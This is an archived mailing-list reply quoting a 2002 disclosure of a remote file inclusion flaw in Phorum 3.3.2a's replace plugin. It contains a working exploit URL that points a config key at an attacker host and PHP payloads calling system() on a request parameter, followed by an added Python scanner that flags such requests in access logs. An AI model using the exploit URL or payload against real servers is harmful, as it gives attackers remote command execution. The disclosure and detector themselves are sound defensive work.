Markus Arndt wrote:

> Target:
> Phorum 3.3.2a (prior versions?)
>
> Description:
> In Phorum 3.3.2a (a bulletin board) there's a security flaw that lets remote users
> include external php scripts and execute arbitrary code.
>
> Found by:
> Markus Arndt <markus-arndtat_private>
>
> Vendor:
> http://www.phorum.org
>
> Notified Vendor:
> Yes, already fixed version available
>
> Details:
>
> After extracting the Phorum 3.3.2a archive we have lots of php files and subfolders.
> I just snooped around a bit and found this file vulnerable to remote script inclusion:
>
> ./plugin/replace/plugin.php
>
> let's see some code:
>
> <?php
> include("$PHORUM[settings_dir]/replace.php");
>
> function mod_replace_read_body ($body) {
>     global $pluginreplace;
>     reset($pluginreplace);
>     while(list($key,$val) = each($pluginreplace)) {
>         $body = str_replace($key,$val,$body);
>     }
>     return $body;
> }
>
> $plugins["read_body"]["mod_replace"]="mod_replace_read_body";
>
> ?>
>
> Easy one..
>
> http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
>
> This one will get the file http://[evilhost]/replace.php and execute it.
> If [evilhost] has php enabled we could use this one as replace.php:
>
> <?
> echo("<?
> system(\"\$cmd\");
> ?>");
> ?>
>
> If it's not php-enabled simply:
> <?
> system("$cmd");
> ?>
>
> Markus Arndt <markus-arndtat_private>
> http://skka.de

Also admin.php is exploitable ;)

forum/plugin/replace/admin.php:

include("$PHORUM[settings_dir]/replace.php");
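Detection logic for the bug class discussed in this thread, as an added example that is not part of the original post or of the Phorum code base: it parses Apache/NCSA combined-format access logs (an assumption about the log format) and flags requests that rewrite a PHORUM[...] configuration key through the query string or pass a URL-valued parameter, scoring the exact pattern from the advisory (a config-key override carrying a remote URL, or a remote URL aimed at one of the two replace-plugin files) highest. The sample log lines, the client addresses and the evil.example host are constructed for the demonstration.

```python
"""Flag remote-file-inclusion attempts of the kind described in the Phorum
advisory above in web-server access logs.

Added example, not part of the original post or of Phorum. Assumes
Apache/NCSA combined log format; the sample lines, client addresses and the
"evil.example" host are constructed for the demonstration."""
import re
from urllib.parse import parse_qsl, urlsplit

# Leading fields of a combined-format access log entry, up to the status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) '
)

# The two files the advisory shows doing include("$PHORUM[settings_dir]/replace.php")
VULNERABLE_PATHS = ("/plugin/replace/plugin.php", "/plugin/replace/admin.php")

# A parameter value that is itself a URL is the hallmark of a remote include attempt
REMOTE_URL_RE = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)

# Constructed sample log: two RFI attempts (one percent-encoded), one benign
# request, and one benign request that merely carries a URL-valued parameter
SAMPLE_LOG = """\
203.0.113.5 - - [18/May/2002:14:10:02 -0700] "GET /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://evil.example&cmd=ls HTTP/1.0" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [18/May/2002:14:10:09 -0700] "GET /phorum/plugin/replace/admin.php?PHORUM%5Bsettings_dir%5D=http%3A%2F%2Fevil.example%2F HTTP/1.0" 200 400 "-" "Mozilla/4.0"
198.51.100.7 - - [18/May/2002:14:11:30 -0700] "GET /phorum/read.php?f=1&i=42&t=42 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
198.51.100.9 - - [18/May/2002:14:12:01 -0700] "GET /phorum/list.php?f=1&ref=http://example.org/ HTTP/1.1" 200 3000 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Split one access-log line into client, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes names and values, so the encoded
    # PHORUM%5Bsettings_dir%5D variant is seen as PHORUM[settings_dir]
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return (severity, reasons) for one parsed request; severity is None when nothing is suspicious."""
    reasons = []
    on_vulnerable_path = rec["path"].endswith(VULNERABLE_PATHS)
    override_with_url = False
    for name, value in rec["params"]:
        # With register_globals on, a query parameter named PHORUM[...] rewrites $PHORUM
        is_override = name.upper().startswith("PHORUM[")
        is_url = REMOTE_URL_RE.match(value.strip()) is not None
        if is_override:
            reasons.append(f"request rewrites config key {name}")
        if is_url:
            reasons.append(f"parameter {name} carries a remote URL")
        override_with_url = override_with_url or (is_override and is_url)
    if not reasons:
        return None, reasons
    url_seen = any("remote URL" in r for r in reasons)
    if override_with_url or (on_vulnerable_path and url_seen):
        severity = "high"      # the exact pattern from the advisory
    elif any("rewrites config" in r for r in reasons):
        severity = "medium"    # config override without a URL, e.g. a local path
    else:
        severity = "low"       # URL-valued parameter elsewhere; often benign
    if on_vulnerable_path:
        reasons.append("path is a Phorum replace-plugin include")
    return severity, reasons


def scan(log_text):
    """Run classify() over every line and return the suspicious requests in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        severity, reasons = classify(rec)
        if severity is not None:
            hits.append({"ip": rec["ip"], "path": rec["path"],
                         "severity": severity, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["severity"].upper(), hit["ip"], hit["path"], "; ".join(hit["reasons"]))
```

The "medium" tier exists because the root cause is the include path being built from request-controllable data at all, not the remote URL specifically: a PHORUM[settings_dir] override pointing at a local path is the same bug with a different payload, and the durable fix on the application side is to stop deriving include paths from anything register_globals can populate.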
This archive was generated by hypermail 2b30 : Sat May 18 2002 - 14:54:35 PDT